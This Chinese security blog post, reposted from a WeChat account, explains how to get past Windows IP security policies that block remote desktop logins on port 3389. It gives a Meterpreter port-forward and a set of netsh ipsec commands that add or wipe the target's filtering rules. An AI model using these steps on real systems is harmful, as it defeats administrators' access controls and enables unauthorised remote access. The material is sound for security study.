|
|
症状说明:
远程桌面由于以下原因之一无法连接到远程计算机:确保打开远程计算机,连接到网络并启用远程访问"。
问题原因:
secpol.msc中设置了IP安全策略,如:仅允许或拒绝特定IP访问,或是直接拒绝了所有IP访问。可自定义IP安全规则,可以设置为任何IP和端口,支持的协议类型有:TCP/UDF/RDP/ICMP/EGP/RAW/RVD等。
IP安全策略这个功能有点类似于XP/2003的TCP/IP筛选,只是更加强大了。
解决方案:
(1) 使用Meterpreter的portfwd命令将目标的3389端口转发出来后即可成功绕过IP安全策略,因为最终流量是走的它本机,如:
-
127.0.0.1:3389>-<127.0.0.1:22196
(2) 直接在命令行使用以下几条Netsh ipsec命令添加或删除目标机器的IP安全策略规则来进行绕过。
添加IP安全策略:
netsh ipsec static add policy name=阻止3389端口
netsh ipsec static add filterlist name=放行192.168.1.103
netsh ipsec static add filter filterlist=放行192.168.1.103 srcaddr=192.168.1.103 dstaddr=Me dstport=3389 protocol=TCP
netsh ipsec static add filteraction name=放行 action=permit or block
netsh ipsec static add rule name=放行192.168.1.103 policy=阻止3389端口 filterlist=放行192.168.1.103 filteraction=放行
netsh ipsec static set policy name=阻止3389端口 assign=y or n
netsh ipsec static exportpolicy C:WindowsdebugWIAip.ipsec
netsh ipsec static importpolicy C:WindowsdebugWIAip.ipsec
netsh ipsec static del all
推 荐 阅 读
欢 迎 私 下 骚 扰
本文始发于微信公众号(潇湘信安):IP安全策略限制3389登录的绕过方式
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论